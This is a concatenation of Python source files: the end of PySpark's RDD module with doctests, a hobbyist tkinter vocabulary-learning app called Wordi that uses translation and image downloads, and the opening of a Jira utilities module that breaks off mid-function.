>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
wordi_main.py
|
from tkinter import *
import wordi_functions as f
import goslate
import bing_get as b
import random
from PIL import Image,ImageTk
import time
import queue
import threading
import pickle
import os
from tkinter import ttk
#GLOBAL VARIABLES
global_path="D:/wordi project"
en=pickle.load( open( "en_dict.p", "rb" ) )
de=pickle.load( open( "de_dict.p", "rb" ) )
newe=pickle.load( open( "newe_dict.p", "rb" ) )
image=""
learndict={}
target_language="cs"
language="en"
counter=0
allwords=[]
a=[]
flip=0
binary=0
begin=0
gs=goslate.Goslate()
saveadjstate=DISABLED
sensaveadjstate=DISABLED
#END OF GLOBAL VARIABLES
#IMPORT,QUIT BLOCK
def clear_pickles():
global en
global de
global newe
en={}
de={}
newe={}
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
return
def places_forget():
logap.place_forget()
internetimage.place_forget()
back.grid_forget()
forth.grid_forget()
sentenci.place_forget()
ask.place_forget()
yes.place_forget()
no.place_forget()
nextsen.place_forget()
translation.place_forget()
adjustentry.place_forget()
saveadjustentry.place_forget()
senadjustentry.place_forget()
savesenadjusted.place_forget()
fin.place_forget()
opentext.place_forget()
createfile.place_forget()
filename.place_forget()
succes.place_forget()
failed.place_forget()
choosebox.place_forget()
learnit.place_forget()
showhide.place_forget()
cor_fal.place_forget()
correct.place_forget()
wrong.place_forget()
nomore.place_forget()
examination.place_forget()
return
def polish_less(listi):
for item in listi:
if item=="":
listi.remove(item)
elif item==" ":
listi.remove(item)
return listi
def polish(listi):
i=0
j=0
for sen in listi:
if sen==[""]:
listi.remove(sen)
if i>=len(listi):
break
for word in sen:
if j>=len(listi[i]):
break
listi[i][j]=listi[i][j].replace(",","")
listi[i][j]=listi[i][j].replace("1","")
listi[i][j]=listi[i][j].replace("2","")
listi[i][j]=listi[i][j].replace("3","")
listi[i][j]=listi[i][j].replace("4","")
listi[i][j]=listi[i][j].replace("5","")
listi[i][j]=listi[i][j].replace("6","")
listi[i][j]=listi[i][j].replace("7","")
listi[i][j]=listi[i][j].replace("8","")
listi[i][j]=listi[i][j].replace("9","")
listi[i][j]=listi[i][j].replace("0","")
listi[i][j]=listi[i][j].replace(",","")
listi[i][j]=listi[i][j].lower()
if listi[i][j]=="":
listi[i].remove(listi[i][j])
j=j+1
if j>=len(listi[i]):
break
if sen==[""]:
listi.remove(sen)
elif sen==[]:
listi.remove(sen)
i=i+1
j=0
return listi
def download():
for sen in allwords:
for word in sen:
if os.path.isfile("D:/wordi project/images/%s"%(word+"1.jpg")):
pass
else:
b.getpic(word)
return
def handle_picture(word):
global finalimage
global image
try:
image=word+str(random.randrange(1,3))+".jpg"
imagepath="D:/wordi project/images/%s"%(image)
finalimage=ImageTk.PhotoImage(Image.open(imagepath))
internetimage.configure(image=finalimage)
except:
print("FAILED")
return
def change_state1(*args):
if adjusted.get()!="":
saveadjustentry.config(state="active")
elif adjusted.get()=="":
saveadjustentry.config(state="disabled")
return
def change_state2(*args):
if senadjusted.get()!="":
savesenadjusted.config(state="active")
elif senadjusted.get()=="":
savesenadjusted.config(state="disabled")
return
def correct_word():
y=adjusted.get()
cell.set(y)
return
def correct_sen():
y=senadjusted.get()
translated.set(y)
return
def change():
global language
if language=="en":
language="de"
else:
language="en"
return
def quiti():
exiti=messagebox.askyesno(title="quit?",message="Are you sure you want to exit Wordi?")
if exiti:
gui.destroy()
return
def openo():
gui.geometry("840x750+100+100")
places_forget()
sentenci.place(x=50,y=100)
ask.place(x=400,y=80)
yes.place(x=50,y=140)
no.place(x=50,y=190)
nextsen.place(x=400,y=250)
translation.place(x=50,y=220)
adjustentry.place(x=50,y=270)
saveadjustentry.place(x=50,y=240)
senadjustentry.place(x=350,y=270)
savesenadjusted.place(x=350,y=240)
internetimage.place(x=0,y=300)
main()
t=threading.Thread(target=download)
progressbar.place(x=100,y=100)
progressbar.start()
progressbar.after(10000, stop_progressbar)
t.start()
#time.sleep(10)
return
def stop_progressbar():
progressbar.stop()
progressbar.place_forget()
initial()
def main():
try:
importopen=filedialog.askopenfile(filetypes=[("Text files","*.txt")])
data=importopen.read()
global startlanguage
language=gs.detect(data)
c=importi(data)
for sen in a:
allwords.append(sen.split(" "))
polish(allwords)
polish(allwords)
except:
pass
return
def initial():
global flip
global now
try:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
barier(flip,allwords[counter])
sentenci.insert(1.0,a[counter])
now=a[counter].split(" ")
polish_less(now)
translated.set(gs.translate(a[counter],target_language,language))
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
raise
return
def importi(data):
global a
a=data.split(".")
return a
def counting():
global flip
flip=flip+1
return
def check_ifin(word,list1,list2,list3):
if word in list1:
return 1
if word in list2:
return 1
if word in list3:
return 1
return 0
def barier(var,listi):
if var>len(listi)-1:
alghoritm_next()
if counter>len(allwords)-1:
finish()
return
return
def finish():
global en
global de
global newe
global begin
yes.place_forget()
no.place_forget()
nextsen.place_forget()
ask.place_forget()
sentenci.place_forget()
translation.place_forget()
adjustentry.place_forget()
saveadjustentry.place_forget()
senadjustentry.place_forget()
savesenadjusted.place_forget()
logap.place(x=140,y=100)
internetimage.place_forget()
begin=0
fin.place(x=250,y=100)
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
return
def alghoritm_next():
pickle.dump( en, open( "en_dict.p", "wb" ) )
pickle.dump( de, open( "de_dict.p", "wb" ) )
pickle.dump( newe, open( "newe_dict.p", "wb" ) )
global counter
if counter>len(allwords)-1:
finish()
else:
global translated
global flip
global now
global begin
save=open("simpletranslation","a")
save.write(str(translated.get()+"\n"))
save.close()
sentenci.configure(state="normal")
sentenci.delete(1.0,"1.%s"%(len(a[counter])))
counter=counter+1
now=a[counter].split(" ")
polish_less(now)
sentenci.insert(1.0,a[counter])
translated.set(gs.translate(a[counter],target_language,language))
sentenci.tag_delete("mytag")
flip=0
begin=0
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
return
def alghoritm_yes():
barier(flip,allwords[counter])
global cell
global begin
begin=begin+len(allwords[counter][flip])
word=allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language)
if language=="en":
fh=open("word_libraryEN.txt","a")
fh.write(str(cell.get())+"\n")
fh.close()
en[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
if language=="de":
deh=open("word_libraryDE.txt","a")
deh.write(str(cell.get())+"\n")
deh.close()
de[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
counting()
try:
barier(flip,allwords[counter])
if check_ifin(allwords[counter][flip],en,de,newe)==1:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
else:
pass
sentenci.configure(state="normal")
sentenci.tag_delete("mytag")
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
raise#print("END")
return
def alghoritm_no():
barier(flip,allwords[counter])
global cell
global begin
begin=begin+len(allwords[counter][flip])
word=allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language)
new=open("word_libraryNEW.txt","a")
new.write(str(cell.get())+"\n")
new.close()
newe[allwords[counter][flip]]= str(cell.get())[str(cell.get()).index("-")+1:]
counting()
try:
barier(flip,allwords[counter])
if check_ifin(allwords[counter][flip],en,de,newe)==1:
while check_ifin(allwords[counter][flip],en,de,newe)==1:
counting()
barier(flip,allwords[counter])
else:
pass
sentenci.configure(state="normal")
sentenci.tag_delete("mytag")
sentenci.tag_add("mytag","1.%s"%(str(a[counter].index(now[flip],begin))),"1.%s"%(str(int(a[counter].index(now[flip],begin))+int(len(now[flip])))))
sentenci.tag_config("mytag",foreground="blue",background="red")
sentenci.configure(state="disabled")
cell.set(allwords[counter][flip]+"-"+gs.translate(allwords[counter][flip],target_language,language))
handle_picture(allwords[counter][flip])
except:
print("END")
return
#END OF IMPORT,QUIT
#LEARN BLOCK
def learno():
gui.geometry("1000x550+100+100")
places_forget()
choosebox.place(x=840,y=0)
learnit.place(x=840,y=470)
examination.place(x=840,y=520)
detect_file()
logap.place(x=140,y=100)
return
def detect_file():
x=0
for file in os.listdir(global_path):
if ".wordi" in file:
choosebox.insert(x,file)
x=x+1
return
def alghoritm_learn():
global counter
global myvariables
counter=0
ask.place(x=300,y=40)
showhide.place(x=300,y=90)
back.grid(row=1,column=0,sticky=W)
forth.grid(row=1,column=4,sticky=E)
keywords=list(newe.keys())
cor_fal.place(x=300,y=120)
cor_fal.bind("<Return>",checkinput)
global learndict
learndict={}
myvariables=[]
words=[]
logap.place_forget()
file=str(choosebox.get(ACTIVE))
with open(file,"r") as f:
r=f.read()
worde=r.split(".")
for sen in worde:
words.append(sen.split(" "))
polish(words)
f.close()
for sen in words:
for word in sen:
if word in keywords:
learndict[word]=newe[word]
myvariables=list(learndict.keys())
if counter>=len(myvariables):
print("No words")
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
def alghoritm_show():
global binary
if binary==0:
showhide["text"]="Hide answer!"
internetimage.place(x=0,y=200)
translation.place(x=300,y=60)
binary=1
elif binary==1:
showhide["text"]="Show answer!"
internetimage.place_forget()
translation.place_forget()
binary=0
return
def forthin():
global counter
nomore.place_forget()
correct.place_forget()
wrong.place_forget()
counter=counter+1
check_index()
return
def backin():
global counter
nomore.place_forget()
correct.place_forget()
wrong.place_forget()
counter=counter-1
check_index()
return
def checkinput(event):
correct.place_forget()
wrong.place_forget()
if enter.get()==learndict[myvariables[counter]]:
correct.place(x=300,y=250)
else:
wrong.place(x=300,y=250)
return
def check_index():
global counter
if counter>=len(myvariables):
nomore.place(x=300,y=250)
counter=0
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
def exam_me():
global counter
global myvariables
counter=0
ask.place(x=300,y=40)
back.grid(row=1,column=0,sticky=W)
forth.grid(row=1,column=4,sticky=E)
keywords=list(newe.keys())
cor_fal.place(x=300,y=120)
cor_fal.bind("<Return>",checkinput)
global learndict
learndict={}
myvariables=[]
words=[]
logap.place_forget()
file=str(choosebox.get(ACTIVE))
with open(file,"r") as f:
r=f.read()
worde=r.split(".")
for sen in worde:
words.append(sen.split(" "))
polish(words)
f.close()
for sen in words:
for word in sen:
if word in keywords:
learndict[word]=newe[word]
myvariables=list(learndict.keys())
if counter>=len(myvariables):
print("No words")
else:
cell.set(myvariables[counter])
translated.set(learndict[myvariables[counter]])
handle_picture(myvariables[counter])
return
#END OF LEARN BLOCK
#OPEN BLOCK
def textigui():
places_forget()
opentext.place(x=0,y=30)
createfile.place(x=0,y=30)
filename.place(x=150,y=30)
return
def create_wordi():
alltext=str(opentext.get("1.0",'end-1c'))
name=str(named.get())+".wordi.txt"
file = open(name,'a')
file.write(alltext)
file.close()
if os.path.isfile(name):
succes.place(x=200,y=200)
else:
failed.place(x=200,y=200)
return
#END OF OPEN BLOCK
#GUI BLOCK
gui=Tk()
gui.title("Wordi")
gui.geometry("840x550+100+100")
gui.configure(background="white")
wmenu=Menu(gui)
wordimenu=Menu(wmenu, tearoff=0)
wordimenu.add_command(label="learn",command=learno)
wordimenu.add_command(label="import",command=openo)
wordimenu.add_command(label="open",command=textigui)
wordimenu.add_checkbutton(label="deutsch",command=change)
wordimenu.add_command(label="configure",command=f.a)
wmenu.add_cascade(label="Wordi",menu=wordimenu)
wmenu.add_command(label="Stacistics",command=f.a)
aboutmenu=Menu(wmenu, tearoff=0)
aboutmenu.add_command(label="This program",command=f.a)
aboutmenu.add_command(label="About me",command=f.a)
wmenu.add_cascade(label="About", menu=aboutmenu)
wmenu.add_command(label="Help",command=f.a)
wmenu.add_command(label="Quit",command=quiti)
gui.configure(menu=wmenu)
forthi=PhotoImage(file="forth.gif")
backi=PhotoImage(file="back.gif")
textversion=PhotoImage(file="textv.gif")
movieversion=PhotoImage(file="moviev.gif")
importphoto=PhotoImage(file="import_button.gif")
backgroundi=PhotoImage(file="background.gif")
learnphoto=PhotoImage(file="learn_button.gif")
openphoto=PhotoImage(file="open_button.gif")
configurephoto=PhotoImage(file="configure_button.gif")
logo=PhotoImage(file="Wordilogo.gif")
languagephoto=PhotoImage(file="language_button.gif")
background_label=Label(gui,image=backgroundi)
back=Button(gui,image=backi,command=backin,bd=0)#.grid(row=0,column=0)
forth=Button(gui,image=forthi,command=forthin,bd=0)#.grid(row=0,column=1)
textv=Button(gui, image=textversion, command=f.a)#.grid(row=0,column=3,sticky=N)
moviev=Button(gui,image=movieversion, command=f.a)#.grid(row=0,column=5,sticky=N)
import_button=Button(gui,image=importphoto,command=openo,bd=0)
open_button=Button(gui,image=openphoto,bd=0,command=textigui)
learn_button=Button(gui,image=learnphoto,bd=0,command=learno)
configure_button=Button(gui,image=configurephoto,bd=0,command=f.a)
language_button=Button(gui,image=languagephoto,bd=0,command=f.a)
logap=Label(gui,image=logo, bg="#1f1f1f",padx=10,pady=10)
background_label.place(x=0,y=0)
open_button.grid(row=0,column=0)
import_button.grid(row=0,column=1)
logap.place(x=140,y=100)
learn_button.grid(row=0,column=2)
configure_button.grid(row=0,column=3)
language_button.grid(row=0,column=4)
translated=StringVar()
cell=StringVar()
adjusted=StringVar()
senadjusted=StringVar()
named=StringVar()
showor=StringVar()
enter=StringVar()
adjusted.trace("w",change_state1)
senadjusted.trace("w",change_state2)
finalimage=ImageTk.PhotoImage(Image.open("D:/wordi project/Wordilogo.gif"))
sentenci=Text(gui,bg="#1f1f1f",font=("Times", 10, "bold"),fg="white",height=1,width=170)
sentenci.configure(relief=FLAT)
ask=Label(gui,textvariable=cell,bg="#1f1f1f",font=("Times", 14, "bold"),fg="red")
yes=Button(gui,text="YES",command=alghoritm_yes)
no=Button(gui,text="NO",command=alghoritm_no)
nextsen=Button(gui,text="SAVE IT",command=alghoritm_next)
translation=Label(gui,textvariable=translated,bg="#1f1f1f",font=("Times", 10, "bold"),fg="white")
adjustentry=Entry(gui,textvariable=adjusted)
saveadjustentry=Button(gui,text="Correct word translation",command=correct_word,state=saveadjstate)
senadjustentry=Entry(gui,textvariable=senadjusted)
savesenadjusted=Button(gui,text="Correct sentence translation",command=correct_sen,state=sensaveadjstate)
internetimage=Label(gui,image=finalimage,bg="#1f1f1f",width=840,height=500)
fin=Label(gui,text="All words have been imported!",bg="#1f1f1f",font=("Times", 10, "bold"))
opentext=Text(gui,bg="white",width=84,height=150)
createfile=Button(gui,command=create_wordi,text="Create wordi file",font=("Times", 10, "bold"))
filename=Entry(gui,textvariable=named,bg="grey",fg="green")
succes=Label(gui,text="File was succesfuly created!",font=("Times", 20, "bold"),fg="black",bg="white")
failed=Label(gui,text="Failed to create file!(see help)",font=("Times", 20, "bold"),fg="black",bg="white")
choosebox=Listbox(gui,width=50,height=23,font=("Times", 10, "bold"))
learnit=Button(gui,text="Learn!",font=("Times", 12, "bold"),fg="blue",bg="grey",command=alghoritm_learn)
showhide=Button(gui,text="Show answer!",font=("Times", 10, "bold"),command=alghoritm_show)
cor_fal=Entry(gui,textvariable=enter,bg="white",fg="blue")
correct=Label(gui,text="Correct!",font=("Times", 12, "bold"),fg="green")
wrong=Label(gui,text="Wrong!",font=("Times", 12, "bold"),fg="red")
nomore=Label(gui,text="No more words to learn!",font=("Times", 12, "bold"),fg="green",bg="grey")
examination=Button(gui,text="Test",font=("Times", 12, "bold"),fg="blue",bg="grey",command=exam_me)
progressbar=ttk.Progressbar(orient=HORIZONTAL, length=600, mode='determinate')
#END OF GUI BLOCK
gui.mainloop()
|
__init__.py
|
"""Jira utils used internally."""
import threading
import warnings
from typing import Any, Optional, cast
from requests import Response
from requests.structures import CaseInsensitiveDict as _CaseInsensitiveDict
from jira.resilientsession import raise_on_error
class CaseInsensitiveDict(_CaseInsensitiveDict):
"""A case-insensitive ``dict``-like object.
DEPRECATED: use requests.structures.CaseInsensitiveDict directly.
Implements all methods and operations of
``collections.MutableMapping`` as well as dict's ``copy``. Also
provides ``lower_items``.
All keys are expected to be strings. The structure remembers the
case of the last key to be set, and ``iter(instance)``,
``keys()``, ``items()``, ``iterkeys()``
will contain case-sensitive keys. However, querying and contains
testing is case insensitive::
cid = CaseInsensitiveDict()
cid['Accept'] = 'application/json'
cid['accept'] == 'application/json' # True
list(cid) == ['Accept'] # True
For example, ``headers['content-encoding']`` will return the
value of a ``'Content-Encoding'`` response header, regardless
of how the header name was originally stored.
If the constructor, ``.update``, or equality comparison
operations are given keys that have equal ``.lower()`` s, the
behavior is undefined.
"""
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"Use requests.structures.CaseInsensitiveDict directly", DeprecationWarning
)
super().__init__(*args, **kwargs)
def threaded_requests(requests):
for fn, url, request_args in requests:
th = threading.Thread(target=fn, args=(url,), kwargs=request_args, name=url)
th.start()
for th in threading.enumerate():
